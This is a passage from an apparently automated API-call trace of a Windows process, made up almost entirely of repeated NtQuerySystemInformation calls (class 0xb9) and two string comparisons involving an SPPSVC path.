(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0276.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0276.936] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0276.946] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.958] NtQuerySystemInformation 